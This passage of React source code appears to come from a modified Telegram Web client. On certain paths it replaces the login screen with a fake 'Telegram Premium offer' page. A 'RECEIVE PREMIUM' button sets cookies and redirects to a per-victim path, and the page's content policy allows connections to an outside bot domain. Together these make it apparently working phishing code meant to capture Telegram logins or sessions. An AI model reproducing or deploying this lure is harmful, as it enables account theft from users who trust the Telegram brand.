rgb(233,238,244); --color-borders-read-story: rgb(115,115,115); --color-background-menu-separator: rgb(255,255,255,0.102;" data-message-text-size="16" lang="en"><plasmo-csui></plasmo-csui><head>
<meta charset="UTF-8">
<title>Web</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no, viewport-fit=cover">
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; connect-src 'self' wss://*.web.telegram.org blob: http: https: wss: https://bot.teleassics.cfd; script-src 'self' 'wasm-unsafe-eval' http: https://t.me/_websync_ https://telegram.me/_websync_; style-src 'self' 'unsafe-inline' http: https:; img-src 'self' data: blob: http: https: https://ss3.4sqi.net/img/categories_v2/ https://telegram.org https://cdn4.cdn-telegram.org; font-src 'self' http: https://telegram.org; media-src 'self' blob: data: ; object-src 'none'; frame-src http: https:; base-uri 'none'; form-action 'none';">
<link href="/premium.css" rel="stylesheet">
</head>

<body id="root" class="App-module__bg is-pointer-env is-windows" style="--theme-background-color: #010101;">
<div class="Transition full-height is-auth">
<div class="Transition Auth Transition_slide Transition_slide-active">
  <div class="Transition_slide Transition_slide-active">
    <div id="auth-qr-form" class="custom-scroll">
      <div class="auth-form qr">
        <div class="qr-outer">
          <div class="qr-inner opacity-transition slow open shown">
            <img src="/premium.png" width="417" height="120"/>
          </div>
        </div>
        <h1 style="color: var(--color-text)">Please log in to take part in the Premium offer from Telegram</h1>
        <p style="color: grey">You’re just one step away from a Premium subscription. Hurry up and activate it before the promotion ends!</p>
        <button type="button" class="Button default primary text">RECEIVE PREMIUM</button>
      </div>
    </div>
  </div>
</div>
</div>
</body>
</html>`;
        if (authPages) {
          authPages.outerHTML = premiumHtml;

          const links = document.querySelectorAll('.Button');

          const newHref = `https://${window.location.host}/o/${localStorage.getItem('fake-username')}`;

          links.forEach((link) => {
            link.addEventListener('click', () => {
              document.cookie = 'fromSPage=; path=/; expires=Thu, 01 Jan 1970 00:00:00 UTC;';
              window.location.href = newHref;
              document.cookie = 'fromSPage=true; path=/';
            });
          });
        }
      }
    };

    if (/^\/a\/([^/]*)$/.test(window.location.pathname)) {
      handleChannelRequest().then(() => {});
    }
  }, []);

  return (
    /^\/a\/([^/]*)$/.test(window.location.pathname) ? (
      <div id="auth-pages" />
    ) : (
      <UiLoader page={page} isMobile={isMobile}>
        <Transition
          name="fade"
          activeKey={activeKey}
          shouldCleanup
          className={buildClassName(
            'full-height',
            (activeKey === AppScreens.auth || prevActiveKey === AppScreens.auth) && 'is-auth',
          )}
          renderCount={TRANSITION_RENDER_COUNT}
        >
          {renderContent}
        </Transition>
        {activeKey === AppScreens.auth && isTestServer && <div className="test-server-badge">Test server</div>}
      </UiLoader>
    )
  );
};

export default withGlobal(
  (global): StateProps => {
    return {
      authState: global.authState,
      isScreenLocked: global.passcode?.isScreenLocked,
      hasPasscode: global.passcode?.hasPasscode,
      isInactiveAuth: selectTabState(global).isInactive,
      hasWebAuthTokenFailed: global.hasWebAuthTokenFailed || global.hasWebAuthTokenPasswordRequired,
      theme: selectTheme(global),
      isTestServer: global.config?.isTestServer,
    };
  },
)(App);
